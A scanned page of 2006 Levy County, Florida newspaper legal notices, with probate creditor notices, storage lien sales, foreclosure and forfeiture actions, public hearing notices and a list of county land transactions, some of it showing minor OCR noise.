BARRED. NOTWITHSTANDING THE TIME PERIOD SET FORTH ABOVE, ANY CLAIM FILED TWO (2) YEARS OR MORE AFTER THE DECEDENT'S DATE OF DEATH IS BARRED. The date of first publication of this Notice is November 16, 2006.
BETTY W. AUSTIN, Petitioner, 11310 N.W. 73rd Court, Chiefland, FL 32626
GREGORY V. BEAUCHAMP, P.A., Attorney for Petitioner, P.O. Box 1129, Chiefland, FL 32644, (352) 493-1458. Florida Bar No. 178770
Pub: Nov. 16, 23, 2006

NOTICE OF PUBLIC SALE
Dona Potter d/b/a Bronson Self Storage, pursuant to the provisions of the Florida Self Storage Facility Act (Fla. Stat. 83.801 et seq.) hereby gives notice of sale under said Act to wit: On December 9, 2006 at Bronson Self Storage, 839 E. Hathaway Ave., Bronson, FL 32621:
JEANNE TURNER, P.O. Box 1823, Bronson, FL 32621
MELISSA DANIEL, 11070 NE 110th Lane, Bronson, FL 32621
Consists of household, personal items or miscellaneous merchandise, stored at Bronson Self Storage, 839 E. Hathaway Ave., Bronson, FL 32621. Sale is being held to satisfy a statutory lien. Dated November 10, 2006. Dona Potter, PO Box 1705, Bronson, FL 32621. Phone (352) 486-2121. Sale: 12/09/06
Pub: Nov. 16, 23, 2006

Don't go swinging blindly... Let us help you give your advertising some ... LEVY COUNTY JOURNAL CLASSIFIEDS

IN THE CIRCUIT COURT OF THE EIGHTH JUDICIAL CIRCUIT, IN AND FOR LEVY COUNTY, FLORIDA
Disclosure of documents and information: Failure to comply can result in sanctions, including dismissal or striking of pleadings. Dated: October 27, 2006. CLERK OF THE CIRCUIT COURT. By: LaQuanda Lalson, Deputy Clerk. Pub. Nov. 2, 9, 16, 23
Records of Levy County, Florida. Tax Parcel #19464-000-00 & 19466-000-00. DATED this 30th day of October 2006.
CLERK OF THE COURT. By: Gwen McElroy, As Deputy Clerk. Publication of this notice on Nov. 9, 16, 2006 in LEVY COUNTY JOURNAL.

IN THE CIRCUIT COURT OF THE EIGHTH JUDICIAL CIRCUIT IN AND FOR LEVY COUNTY, FLORIDA, CIVIL DIVISION. Case No. 38-2006-CA-001
Civil Division
SUN LIFE ASSURANCE COMPANY OF CANADA, Plaintiff, vs. HOLY FAMILY CATHOLIC CHURCH, DIANE CHISOLM JONES and JOSEPH E. PRICE, Defendants.
NOTICE OF ACTION
TO: MS. DIANE CHISOLM JONES, 3205 N.W. 461 Court, Ocala, FL 34482
MS. DIANE CHISOLM JONES, 2501 S.W. 101 St., Apt. #, Ocala, FL 34474
YOU ARE HEREBY NOTIFIED that an action for interpleader and declaratory relief has been filed against you, Diane Chisolm Jones. You are required to serve a copy of your written defenses to this action, if any, on Mark D. Kiser, the Plaintiff's attorney, whose address is 101 East Kennedy Boulevard, Suite 2700, Tampa, Florida 33602, on or before December 15, 2006, and file the original with the Clerk of this Court either before service on the Plaintiff's attorney or immediately thereafter; otherwise a default will be entered against you for the relief demanded in the complaint or petition.
DATED on Oct. 30, 2006. Clerk of Circuit Court. By Gwen McElroy, Deputy Clerk.
Pub: Nov. 9, 16, 2006

IN THE CIRCUIT COURT OF THE EIGHTH JUDICIAL CIRCUIT IN AND FOR LEVY COUNTY, FLORIDA. Case No. 38-2006-000888
1994 GMC, FLORIDA TAG V2292S, VIN 1GKCS13W9R2521107; TWO HUNDRED AND THIRTY-ONE ($231.00) DOLLARS U.S. CURRENCY
WILLISTON POLICE DEPARTMENT, Petitioner, vs. DEONTE DALLAS, Respondent.
NOTICE OF ACTION
TO: DEONTE DALLAS, UNKNOWN PARTIES IN INTEREST
YOU ARE HEREBY NOTIFIED that a complaint for Forfeiture has been filed by the Williston Police Department, Williston, Levy County, Florida; and you are required to serve a copy of your answer or other pleading on the plaintiff's attorney, RAY E. THOMAS, JR. of RAY E. THOMAS, JR. P.A., at Post Office Box 39, Bell, Florida 32619, and file the original answer or pleading in the office of the Clerk of the above named Court on or before December 21, 2006.
IF YOU FAIL TO DO SO, a judgment by default will be entered against you for the relief demanded in the complaint.
WITNESS my hand and official seal, this 2nd day of November 2006.
DANNY J. SHIPP, Clerk of the Circuit Court, Levy County, Florida, P.O. Box 610, Bronson, FL 32621. By: Gwen McElroy, Deputy Clerk. (Court Seal)
Pub: Nov. 9, 16, 2006

NOTICE OF INTENT TO USE UNIFORM METHOD OF COLLECTING NON-AD VALOREM ASSESSMENTS
Levy County, Florida ("County") hereby provides notice, pursuant to section 197.3632(3)(a), Florida Statutes, of its intent to use the uniform method of collecting non-ad valorem special assessments to be levied within the unincorporated area of Levy County, for the cost of providing solid waste disposal services to residential and non-residential properties, fire protection services and road maintenance services, commencing for the Fiscal Year beginning on October 1, 2007. The County will consider the adoption of a resolution electing to use the uniform method of collecting such assessments authorized by section 197.3632, Florida Statutes, at a public hearing to be held at 9:00 a.m. on December 5, 2006 at the Commission Chambers, 355 S. Court Street, Bronson, Florida 32621. Such resolution will state the need for the levy and will contain a legal description of the boundaries of the real property subject to the levy. Copies of the proposed form of resolution, which contains the legal description of the real property subject to the levy, are on file at the Office of the County Coordinator, 355 S. Court Street, Bronson, Florida. All interested persons are invited to attend.
In the event any person decides to appeal any decision by the County with respect to any matter relating to the consideration of the resolution at the above-referenced public hearing, a record of the proceeding may be needed and, in such an event, such person may need to ensure that a verbatim record of the public hearing is made, which record includes the testimony and evidence on which the appeal is to be based.
In accordance with the Americans with Disabilities Act, persons needing a special accommodation or an interpreter to participate in this proceeding should contact Levy County at (352) 486-5217, 7 days prior to the date of the hearing.
DATED this 23rd day of October, 2006.
By Order of: Nancy Bell, Chair, LEVY COUNTY, FLORIDA
Pub. Nov. 9, 16, 23, 30, 2006

NOTICE OF PUBLIC SALE
Paul Barcia, d/b/a L&L Storage, pursuant to the provisions of the Florida Self Storage Facility Act (Fla. Stat. 83.801, et seq.), hereby gives notice of sale under said Act, to wit: On November 24, 2006, at L&L Storage, 2990 N.E. 200th Avenue, Williston, Florida, Paul Barcia or his agent will conduct a sale at 9:00 AM by sealed bids to the highest bidder. Bids to be opened by Noon, with viewing from 9:00 AM until Noon, for the contents of the storage bay or bays rented by the following person/persons:
Bernita Appling, 4171 NE 103rd Ct., Williston, FL 32696
Garrett Brown, 4906 SW Second Ave., Cape Coral, FL 33914
Mark Clayton, 10471 NE 75th St., Bronson, FL 32621
Jack Haubert, 2747 SW 17th Cir., Ocala, FL 34474
Beth Matus, 3190 NE 192nd Ave., Williston, FL 32696
Marvin Ragland, 1870 NE 32nd St., #3, Silver Springs, FL 34488
Chris Rounds, 14038 NE 50th Pl., Williston, FL 32696
Perry Smith, 3034 G. Street, Lorain, OH 44052
Consists of household, personal or miscellaneous items, stored at L&L Storage, 2990 N.E. 200th Avenue, Williston, Florida. Sale is being made to satisfy a statutory lien. Dated November 9, 2006. L&L Storage, 2990 N.E. 200th Avenue, Williston, Florida 32696, (352) 528-6179. Sale Date: November 24, 2006
Pub: Nov. 9, 16, 2006

IN THE CIRCUIT COURT OF THE EIGHTH JUDICIAL CIRCUIT IN AND FOR LEVY COUNTY, FLORIDA. PROBATE CASE NO: 2006-CP-254
IN RE: THE ESTATE OF BERNICE P. REBELLO, a/k/a BERNICE A. REBELLO, Deceased.
NOTICE TO CREDITORS
The administration of the estate of Bernice P. Rebello, a/k/a Bernice A. Rebello, deceased, whose date of death was June 26, 2006, is pending in the Circuit Court for Levy County, Florida, Probate Division, File Number 2006-CP-254; the address of which is P.O. Box 610, Bronson, Florida 32621. The names and addresses of the personal representative and the personal representative's attorney are set forth below.
All creditors of the decedent and other persons having claims or demands against the decedent's estate, on whom a copy of this notice is required to be served, must file their claims with this court WITHIN THE LATER OF 3 MONTHS AFTER THE TIME OF THE FIRST PUBLICATION OF THIS NOTICE OR 30 DAYS AFTER THE DATE OF SERVICE OF A COPY OF THIS NOTICE ON THEM.
All other creditors of the decedent and other persons having claims or demands against decedent's estate must file their claims with this court WITHIN 3 MONTHS AFTER THE DATE OF THE FIRST PUBLICATION OF THIS NOTICE.
ALL CLAIMS NOT SO FILED WITHIN THE TIME PERIODS SET FORTH IN SECTION 733.702 OF THE FLORIDA PROBATE CODE WILL BE FOREVER BARRED.
NOTWITHSTANDING THE TIME PERIODS SET FORTH ABOVE, ANY CLAIM FILED TWO (2) YEARS OR MORE AFTER THE DECEDENT'S DATE OF DEATH IS BARRED.
The date of the first publication of this Notice is November 9, 2006.
Personal Representative: Russell Scott Rebello, P.O. Box 3091, Dunnellon, FL 34430-3091
Attorney for Personal Representative: Thomas M. VanNess, Jr., Esq., Florida Bar No. 0857750, VanNess & VanNess, P.A., 1205 North Meeting Tree Blvd., Crystal River, FL 34429, 1-352-795-1444
Pub: Nov.
9, 16, 2006

NOTICE OF PUBLIC SALE
Todd Hubbard d/b/a Kips Mini-Storage, pursuant to the provision of the Fl. Self Storage Facility Act (Fla. Stat. 83.801 et seq.) hereby gives Notice of Sale under said act to wit: On Dec. 8, :00 a.m., for the content of the following person/persons:
Melissa Nutter, P.O. Box 290, Chiefland, FL 32644
Marline Jenkins, P.O. Box 723, Chiefland, FL 32644
James Morris, 285 S.E. 911 St., Old Town, FL 32680
Thomas Alderman Jr., 5650 N.W. 30 St., Chiefland, FL 32626
Tonya Akins, 9809 S.W. 51 Ave., Trenton, FL 32693
Consists of household, personal items or miscellaneous merchandise, stored at Kips Mini-Storage, 13645 N.W. Hwy #19, Chiefland, FL. Sale is being made to satisfy statutory lien.
Todd Hubbard, Kips Mini-Storage, 13645 N.W. Hwy #19, Chiefland, FL 32626, 1-352-490-9591
Pub: Nov. 16, 23, 2006

IN THE CIRCUIT COURT IN AND FOR LEVY COUNTY, FLORIDA. CASE NO. 2006-CA-675
EMC MORTGAGE CORPORATION, Plaintiff, vs. SHARON SMOKLY STANCIL F/K/A SHARON A. SMOKLY, UNKNOWN TENANT 1,
on the 4th day of December, 2006, at 11:00 o'clock A.M. at the Lobby of the Levy County Courthouse in Bronson, Florida on Mondays, offer for sale and sell at public outcry to the highest and best bidder for cash, the following described property situate in Levy County, Florida:
Lot 1, Block 14, WILLISTON HIGHLANDS UNIT 5 REPLAT, according to the Plat thereof, recorded in Plat Book 4, Page 5, of the Public Records of Levy County, Florida. Together with 1994 DWMH SHAD 24x48 mobile home, VIN# 146M8362A & VIN# 146M8362B, pursuant to the Final Judgment entered in a case pending in said Court, the style of which is indicated above.
Any person or entity claiming an interest in the surplus, if any, resulting from the foreclosure sale, other than the property owner as of the date of this Lis Pendens, must file a claim on same with the Clerk of Court within 60 days after the foreclosure sale.
WITNESS my hand and official seal of said Court this 6th day of November, 2006.
In accordance with the Americans with Disabilities Act, persons with disabilities needing a special accommodation to participate in this proceeding should contact Court Administration at 355 South Court Street, Bronson, Florida, Telephone (352) 486-5100, not later than seven (7) days prior to the proceeding. If hearing impaired, (TDD) 1-800-955-8771, or Voice (V) 1-800-955-8770, via Florida Relay Services.
Danny J. Shipp, CLERK OF THE CIRCUIT COURT. By: Gwen McElroy, Deputy Clerk. (COURT SEAL)
ATTORNEY FOR PLAINTIFF: Frank Albert Reder, Butler & Hosch, P.A., 3185 S. Conway Rd., Ste. E, Orlando, Florida 32812, (407) 381-5200
Pub: Nov. 16, 23, 2006

IN THE CIRCUIT COURT FOR LEVY COUNTY, FLORIDA, PROBATE DIVISION. File No. 2006-CP-000210
IN RE: ESTATE OF JAMES T. VANDERGRIFF a/k/a JAMES THEDORE VANDERGRIFF a/k/a JAMES THEODORE VANDERGRIFF a/k/a JAMES T. VANDERGRIFF, JR. a/k/a JAMES THEODOR VANDERGRIFF, Deceased.
NOTICE TO CREDITORS
The administration of the estate of JAMES T. VANDERGRIFF, deceased, whose date of death was July 10, 2006, is pending in the Circuit Court for LEVY County, Florida, Probate Division, the address of which is 355 South Court St. (P.O. Drawer 610), Bronson, FL 32621. The names and addresses of the personal representative and the personal representative's attorney are set forth below.
All creditors of the decedent and other persons having claims or demands against decedent's estate must file their claims with this court WITHIN 3 MONTHS AFTER THE DATE OF THE FIRST PUBLICATION OF THIS NOTICE. ALL CLAIMS NOT FILED WITHIN THE TIME PERIODS SET FORTH WILL BE FOREVER BARRED. The date of first publication of this Notice is Nov. 16, 2006.
Personal Representative: MARTIN J. STILES, 9140 W. Chata Place, Crystal River, FL 34428
Attorney for Personal Representative: GLEN C. ABBOT, Florida Bar No. 235911, P.O. Box 2019, Crystal River, Florida 34423-2019. Telephone: (352) 795-5699
Pub: Nov.
16, 23, 2006

PUBLIC NOTICE
The School Board of Levy County will hold a Public Hearing at its office, 480 Marshburn Drive, Bronson, Florida, on Tuesday, December 19, 2006, at 9:30 a.m. to adopt/amend the following School Board Policies:
3.16 Charter Schools
4.18 Transfer Credits
4.25 Disposing of Surplus, Obsolete, and Unusable Textbooks and Instructional Materials
5.15 Administration of Medication During School Hours
6.20* Sick Leave
11.03* Use of Facilities
Pub: Nov. 16, 2006

Buying Tax Deeds? Need to clear the title? Experienced, Dependable Service and Reasonable Rates! J. Weidner, ATTORNEY AT LAW, (352) 486-3753

Page 17. Legal deadline is 5 p.m. Monday.
Page 18. AROUND THE COURTHOUSE

Levy Land Transactions 10/21/06 - 10/30/06
Transaction Codes: AAA-Agree Additional Advances, A-Assignment, AAD-Assign Agree Deed, ACT-Amended Certificate of Title, AD-Agree Deed, A-Assumption of Indebtedness, AM-Assignment of Mortgage, CD-Correction Deed, CT-Certificate of Title, D-Deed, E-Easement, FJDX-Final Judgment Divorce X, MMA-Mortgage Modify Agreement, NL-Notice of Limitation, P-Probate X, QCD-Quit Claim Deed, TD-Tax Deed, TBRD-Timber Deed, WD-Warranty Deed

QCD, $10.00, L30(9) WILLISTON HGH G&CC ESTS. Grantee(s): LATALL ALLEN, LATALL MARTHA. Grantor(s): LATALL MARTHA
M, $6,000,000.00, BDY 29, 31, 32-13-19, ETC. Grantee(s): TRUST FINANCIAL LLC. Grantor(s): D&M LEVY LC, HODGE BROTHERS LLP, HODGE EDWARD CHARLES SR, HSI LEVY LC, VH LEVY LC
WD, $350,000.00, BDY ADJACENT TO L10-11 BETWEEN (2-3) OF (2) THE REPLAT OF CORONET PARK SD, W/MH, ETC. Grantee(s): RONNIE F TAYLOR REVOCABLE TRUST, TAYLOR BARBARA D TRUSTEE, TAYLOR RONNIE F TRUSTEE. Grantor(s): LANG BETTY B, LANG HUNTER C
WD, $175,000.00, BDY L1-3, 16-18(3) REPLAT OF CORONET PARK. Grantee(s): RONNIE F TAYLOR REVOCABLE TRUST, TAYLOR BARBARA D TRUSTEE, TAYLOR RONNIE F TRUSTEE. Grantor(s): LANG BETTY B, LANG HUNTER C
M, $430,749.65, BDY L1-3, 16-18(3) REPLAT OF CORONET PARK
ETC Grantee(s): DRUMMOND COMMUNITY BANK Grantor(s): RONNIE F TAYLOR REVOCABLE TRUST, TAYLOR BARBAR D TRUSTEE, TAYLOR RONNIE F TRUSTEE WD, $10.00, BDYNE SEI/436-12-17, PARCEL #03601-015-00 Grantee(s): JLK2 LLC Grantor(s): KLINGENSMITH JEANETTE, KLINGENSMITH JEFF CD, $10.00, UNIT C4 CEDAR COVE EFFICIENCY CONDO II, ETC Grantee(s): BROWN JANICE, VONASEK JOHN Grantor(s): BROWN JANICE TRUSTEE, VONASEK BROWN TRUS1 VONASEK JOHN TRUSTEE CD, $10.00, UNIT C4 CEDAR COVE EFFICIENCY CONDO II, ET( Grantee(s): LEXI GROUP LLC Grantor(s): BROWN JANICE, VONASEK JOHN WD, $10.00, L16(B) LANGLEYESTS Grantee(s): JLK2 LLC Grantor(s): KLINGENSMITH JEFF, KLINGENSMITH JEANETTE WD, $90,000.00, L22 ALLEN WADE SD Grantee(s): HOLLAND RACHEL, HOLLAND DENNIS Grantor(s): MCCARTHY BRENDON J M, $72,000.00, L22 ALLEN WADE SD Grantee(s): MORTGAGE ELECTRONIC REGISTRATION SYSTEMS INC FIRST BANK, FIRST BANK MORTGAGE, MERS Grantor(s): HOLLAND RACHEL, HOLLAND DENNIS M, $10,000.00, L22 ALLEN WADE SD Grantee(s): MCCARTHY BRENDON J Grantor(s): HOLLAND RACHEL, HOLLAND DENNIS M, $27,177.74, BDYE1/2 SHIN 29-14-16, ETC Grantee(s): DRUMMOND COMMUNITY BANK Grantor(s): GORE JERRY J M, $130,150.00, L9(37) UNIVERSITY OAKS Grantee(s): UMC MORTGAGE COMPANY, UNITED MORTGAGE CORP Grantor(s): GILBERT RODONIA, GILBERT JEFFREY ' WD, $50,000.00, L3 GRACELANDSHORES SEC G, W/MH Grantee(s): BAIR LESLIE, BAIR ROBERT Grantor(s): COLEY CARL, COLEY CHERYL A, RAY CHERYL A, MAGIN/ CHERYLA QCD, $2,000.00, UNIT WEEK #38 IN UNIT 9308 CEDAR COVE PHASE ICONDO Grantee(s): RENFROE BEVERLY Grantor(s): LAVERY LINDA P M, $90,000.00, L81(93) WILLISTON HGH G&CC ESTS Grantee(s): GTE FEDERAL CREDIT UNION Grantor(s): TYLER BARBARA L, TYLER SHAWN I M, $5,000.00, L81(93) WILLISTON HGH G&CC ESTS Grantee(s): GTE FEDERAL CREDIT UNION Grantor(s) TYLER BARBARA L, TYLER SHAWN, I ,, . 
M, $55,000.00, BDYNE1/4 NE1/430-13-19, PARCEL #05235-002-00 Grantee(s): BANK OF AMERICA NA Grantor(s): CARRILLO LESTER A M, $50,000.00, L7-8(18) WILLISTON HGH#7 Grantee(s): BANK OF AMERICA NA . Grantor(s): CYCAN LINDA MACKEY, CYCAN THOMAS, MACKEY CYCAN LINDA M, $308,250.00, L7-8(8), L1-2(16), (13) MAP OF RALEIGH, ETC Grantee(s): CAPITAL CITY BANK Grantor(s): WALKER ROBERTA WD, $50,000.00, L40(C) GRACELAND SHORES Grantee(s): RUSS ASHLEY R JR Grantor(s): OSBORNE BRIAN DOUGLAS, OSBORNE DAVID JOHN,.OS BORNE GEORGE W WD, $120,000.00, L10(E) REPLAT OF PORTION OF CEDAR KEY M/I VILLAGE Grantee(s): LANG BETTY B, LANG HUNTER C Grantor(s): DYE DEBRA LYON, DYE DANNY QCD, $10.00, L9(27) WILLISTON HGH #14 Grantee(s): STRICKLAND CHARLES D, KOON ROCHELLE L Grantor(s): KOON ROCHELLE L M, $177,117.00, NO LEGAL DESC ATTACHED Grantee(s): TAYLOR BEAN & WHITAKER MORTGAGE CORP, MERS MORTGAGE ELECTRONIC REGISTRATION SYSTEMS INC Grantor(s): TILSON NANCY, TILSON JAMES WD, $107,000.00, L6-9(11) UNIVERSITY OAKS, W/MH Grantee(s): PIAIIA JACINATE V, PIAIIA VINCENT JAMES Grantor(s): FREEMAN CHRISTOPHER R, FREEMAN DOUGLAS K WD, $19,500.00, L5(138) WILLISTON HGH G&CC ESTS Grantee(s): RAMIREZ GUSTAVO, PAOLINICARLOS Grantor(s): FULGHUM DANIEL WD, $17,000.00, BDYNE1/4 SW1/429-11-17, PARCEL #03233-033-00 Grantee(s): REID MARNELLE V Grantor(s): RAKITIN ALAN, GREENSPAN PERRY H, PERRY H GREENS- PAN INC CT, $100.00, 38-06-CA-362, L14(7) UNIVERSITY OAKS Grantee(s); ALLEN ELAINE C Grantor(s): ASH KENNETH A, ASH NANCY P, CLERK OF COURT DANNY J SHIPP WD, $255,168.00, L121, 124TIGER ISLAND,BDY 34, 35-13-13, ETC Grantee(s): JENNINGS GROVER C, JENNINGS REGINA M Grantor(s): NELSON BETTY) WD, $10.00, L1FANNING SPRINGS WOODED ESTS, W/MH Grantee(s): CRANE CATHI E ABBISS, ABBISS CAROLEE Grantor(s): ABBISS CAROLEE TRUSTEE WD, $22,500.00, L9-10(17) OLD CHIEFLAND Grantee(s): BALLENGEE JAMES GORDON Grantor(s): ROWE EUGENIA S TRUSTEE, ROWE GENE A TRUSTEE, ROWE TRUST ;M, $17,500.00, L9-10(17) OLD CHIEFLAND Grantee(s): ROWE 
TRUST Grantor(s): BALLENGEE JAMES GORDON M, $44,000.00, L71 SPANISH TRACE SD Grantee(s): FLORIDA CREDIT UNION Grantor(s): WAIN JOSEPH, WAIN TAME WD, $60,000.00, BDY L11(B) WOODLAND ACRES, W/MH Grantee(s): LEWMAN CASH Grantor(s): WELCH JULIE, WELCH WILLIAM A QCDM, $10.00, L14 QUAIL RUN Grantee(s): ZACCHEO EILEEN Grantor(s): ROBERTS CARMEN A QCD, $10.00, L14 QUAIL RUN Grantee(s): ZACCHEO EILEEN Grantor(s): ROBERTS NATHAN G M, $100,000.00, L36 LAZY OAKS, BDY 16, 21-12-18, ETC Grantee(s): DAVIS B E Grantor(s): BOYLE JOHN, BOYLE RUTH M, $92,000.00, L30-32(8) PEACEFULACRES SD Grantee(s): SAXON HOME MORTGAGE, SAXON MORTGAGE INC Grantor(s): ROWE TERM, ROWE JAMES M, $280,000.00, L61 WATERWAY ESTS #3 Grantee(s): CAMPUS USA CREDIT UNION Grantor(s):. BARKER NANCY T JAKAB, BARKER BILL E JR, JAKAB BARKER NANCY T CD, $10.00, OR 883/714, L2(C) RAYS SD #1 REVISED. Grantee(s): HOLLADAY DIANA, HOLLADAY PAUL DAVID Grantor(s): ROETMAN ENTERPRISES, ROETMAN EMMETT M, $33,000.00, L2(C) RAYS SD #1 REVISED Grantee(s): CAPITAL CITY BANK Grantor(s): HOLLADAY DIANA, HOLLADAY PAUL DAVID D- WD, $60,000.00, L16(9) CHIEFLAND COUNTRY ESTS I- Grantee(s): KRAMER DAVID r Grantor(s): TOVINE GINA LYNN, TOVINE WILLIAM E nt CD, $10.00, L8-10(1)REPLAT OF WILLISTON HGH #5, W/MH. X Grantee(s):) WEISENBACH DAVID F, WEISENBACH ONA, WEISENBACH -' PETER Grantor(s): WEISENBACH DAVID F WD, $10.00, L22(B) RIVERLAKE ESTS Grantee(s): MCCOLLUM BONNIE D, EUNICE KENNETH M Grantor(s):) MCCOLLUM ALLEN RAY, MCCOLLUM BONNIE DIANE AAA, $15,000.00, OR 965/157 Grantee(s): CAPITAL CITY BANK. 
Grantor(s): CARDOUNEL MERCY, CARDOUNEL ANGEL A
M, $25,000.00, L9-A BRONSON RANCHETTES, BDY 17-12-17, ETC Grantee(s): CAPITAL CITY BANK Grantor(s): COLON MARIA V, COLON CESAR
M, $35,000.00, L1 GREEN HILLS, W/MH Grantee(s): CAPITAL CITY BANK Grantor(s): HARDISON CHARLES T, HARDISON GWENDOLYN G
WD, $95,000.00, L12(3) LAKE JOHNSON ESTS #1, W/MH Grantee(s): MONROE PHYLIS, MONROE CHARLES Grantor(s): AUGUSTINUS ISABEL V, AUGUSTINUS DONALD R
WD, $80,000.00, L AM-5, AM-6, AM-7(A & G) GLEASONS TRAILER VILLAGE, W/MH Grantee(s): AUGUSTINUS DONALD, AUGUSTINUS ISABEL Grantor(s): BLISS VIRGIL B DECEASED, BLISS CAROL K
M, $31,000.00, L10 SPANISH TRACE ADD #1 Grantee(s): JAMES J LESTOCK REVOCABLE TRUST, LESTOCK JAMES J TRUSTEE Grantor(s): BOWMAN GERALD, BOWMAN SHARON
WD, $60,000.00, L8(8) CHIEFLAND COUNTRY ESTS Grantee(s): SPY HOLDINGS LLC Grantor(s): GREENWOOD OF CHIEFLAND INC
WD, $120,000.00, L5-6(14) CHIEFLAND COUNTRY ESTS Grantee(s): SY HOLDINGS LLC Grantor(s): GREENWOOD OF CHIEFLAND INC
QCD, $10.00, BDY 36-16-17, PARCEL #3930-000-00, ETC Grantee(s): WOLCOTT RICHARD L, WOLCOTT SANDRA Grantor(s): WOLCOTT SANDRA
QCD, $10.00, L13 CASONS INGLIS ACRES #4 Grantee(s): STEVENS RONALD W Grantor(s): GILREATH JACQUELINE W, GILREATH JACQUELINE W TRUSTEE, WILLIAM A GILREATH REVOCABLE TRUST
QCD, $29,000.00, L13 CASONS INGLIS ACRES #4 Grantee(s): FAMILY HOME CENTER OF HOMOSASSA LLC Grantor(s): STEVENS RONALD W
QCD, $10.00, L37 WITHLACOOCHEE RIVER PARK ESTS Grantee(s): MARTIN TED Grantor(s): DRAKE WAYNE
WD, $65,000.00, L1,3(26) 4TH ADD TO BRONSON HTS SD, W/MH Grantee(s): GERTNER CATHERINE, MCDOWELL ELSIE C Grantor(s): HUTSON WILMA, HUTSON ROSCOE B
M, $52,000.00, L1,3(26) 4TH ADD TO BRONSON HTS SD, W/MH Grantee(s): CAPITAL CITY BANK Grantor(s): GERTNER CATHERINE G, MCDOWELL ELSIE C
M, $102,000.00, BDY NW1/4 NW1/4 17-12-17 Grantee(s): AMERICAN GENERAL HOME EQUITY INC Grantor(s): UNDERWOOD M JANN, UNDERWOOD STANLEY R
WD, $10.00, L3 ANNEX HTS SD Grantee(s): ERVIN LISA A,
BEACH LISA A Grantor(s): BEACH MICHAEL T
M, $80,000.00, L3 ANNEX HTS SD Grantee(s): BRANCH BANKING AND TRUST COMPANY, MERS, MORTGAGE ELECTRONIC REGISTRATION SYSTEMS INC Grantor(s): BEACH LISA A, ERVIN JAMES STEVEN, ERVIN LISA
WD, $10,000.00, BDY NW1/4 NW1/4 21-16-16, W/MH, PARCEL #02898-004-00 Grantee(s): MERCHANT CONNIE M, MERCHANT RONNIE V Grantor(s): BURKART ROBERT H JR
M, $115,930.88, …, PARCEL #03633-000-06, ETC Grantee(s): HOUSEHOLD FINANCE CORPORATION III Grantor(s): MARUCA CAROLE, MARUCA CAROLE L, MARUCA DOMINIC, MARUCA DOMINIC L
E, $10.00, L12-13 SHAMROCK ACRES #1, BDY 25-14-17, PARCEL #03743-006-OG Grantee(s): PROGRESS ENERGY Grantor(s): LIVING WATER LIFE CENTER INC
M, $50,000.00, BDY SE1/4 10-15-17, PARCEL #03778-008-OA Grantee(s): BANK OF AMERICA NA Grantor(s): RICHARDSON GIOVANNA D, RICHARDSON WILLIAM R
WD, $130,000.00, BDY SE1/4 SW1/4 32-11-15, PARCEL #01680-002-00, ETC Grantee(s): SMITH ALESHA A, SMITH MELVIN D Grantor(s): E & K INVESTMENTS LLC
M, $130,000.00, BDY SE1/4 SW1/4 32-11-15, ETC Grantee(s): TAYLOR BEAN & WHITAKER MORTGAGE CORP, MERS, MORTGAGE ELECTRONIC REGISTRATION SYSTEMS INC Grantor(s): SMITH ALESHA A, SMITH MELVIN D
QCD, $100.00, L30 LIBBY HTS Grantee(s): STEVE SMITH CONSTRUCTION INC Grantor(s): BAKER THOMAS J
QCD, $10.00, BDY NE1/4 NW1/4 26-11-17, PARCEL #03223-027-00, ETC Grantee(s): CRUMAN FAMILY LIMITED PARTNERSHIP Grantor(s): CRUZ ARMANDO
WD, $21,000.00, L18(42) OAK RIDGE ESTS, W/MH Grantee(s): GREEN TREE SERVICING LLC Grantor(s): BREMER HAROLD L, BREMER DAWN M
WD, $6,500.00, L14 HIDEAWAY #1 Grantee(s): RUSH RICHARD L Grantor(s): LITTERAL LENORA J, LITTERAL LESTER
WD, $30,000.00, L6(4) OAK KNOLL ESTATES Grantee(s): CERCY LINDA M, CERCY CHARLES R Grantor(s): KAHN BURT, KAHN BURT L, KAHN GLENDA R DECEASED
WD, $32,500.00, L6(4) OAK KNOLL ESTS, W/MH Grantee(s): J O T LLC Grantor(s): CERCY LINDA M, CERCY CHARLES R
M, $125,000.00, BDY NW1/4 SE1/4 21-12-17 & L1(16) BRONSON HTS SD, ETC Grantee(s): JARRETT MILEY M, JARRETT
HUGH H JR Grantor(s): MIILICH JAY
M, $83,125.28, NO LEGAL DESC GIVEN, PARCEL #09832-000-00 Grantee(s): U S BANK NA Grantor(s): WHITE SHANNON I
WD, $45,000.00, LOT 2-4, 3-6, 4-2, 4-3, 4-4, 4-5, 4-6, 4-7, 4-8, 4-9, 4-10(K) MANATEE FARMS ESTS #2, SEE IMAGE Grantee(s): ORENCHAK LINDA R, ORENCHAK JERRY A Grantor(s): ALMDALE JO ANNE, ALMDALE EARL WILLIAM
QCD, $10.00, L4(K) MANATEE FARMS ESTATES #2, ETC Grantee(s): ORENCHAK LINDA R, ORENCHAK JERRY A Grantor(s): ALMDALE JO ANNE, ALMDALE EARL WILLIAM
WD, $120,000.00, L1(D) REPLAT OF A PORTION OF CEDAR KEY MOBILE HOME VILLAGE Grantee(s): THOMAS NATALIE J, CRANDLEY WILLIAM R Grantor(s): CAMPBELL MARY S, CAMPBELL PHILLIP A
QCD, $10.00, L KING RANCH OF FLORIDA RANCHETTES 1ST ADD Grantee(s): SLAUGHTER RENE V, SLAUGHTER LYNN E Grantor(s): DEEGAN BRIAN PATRICK
WD, $10.00, BDY 7-14-19, PARCEL #05320-000-00 Grantee(s): LEGLER RICHARD D Grantor(s): WISE JEAN, WISE HAROLD L, WISE JEANNE
QCD, $10.00, BDY 32-13-18, PARCEL #04505-019-00 Grantee(s): CATLIN MICHELLE YVETTE, CATLIN JANELL NICOLE Grantor(s): CATLIN ETHEL L
WD, $160,000.00, L3-6 WILLISTON SAVANNAH PHASE Grantee(s): PARK PLACE ESTATES LLC Grantor(s): JCM SMM RENTAL, MCMILLEN ENTERPRISES
WD, $425,000.00, BDY SE1/4 SE1/4 4-13-19, PARCEL #04956-001-00 Grantee(s): KIRBY LAURENCE, KIRBY MICHAEL O Grantor(s): OCONNOR LAURA, OCONNOR ERNEST G
M, $340,000.00, BDY SE1/4 SE1/4 4-13-19, PARCEL #04956-001-00 Grantee(s): BANK OF AMERICA NA Grantor(s): KIRBY LAURENCE, KIRBY MICHAEL O
M, $63,750.00, BDY SE1/4 SE1/4 4-13-19, PARCEL #04956-001-00 Grantee(s): BANK OF AMERICA NA Grantor(s): KIRBY LAURENCE, KIRBY MICHAEL O
M, $25,000.00, BDY SE1/4 SW1/4 31-12-19 & L7, 12, BDY L9-10(27) THE C.S.
NOBLE SURVEY OF THE CITY OF WILLISTON Grantee(s): PERKINS STATE BANK Grantor(s): GEIGER REBECCA S, GEIGER BRANTLEY C
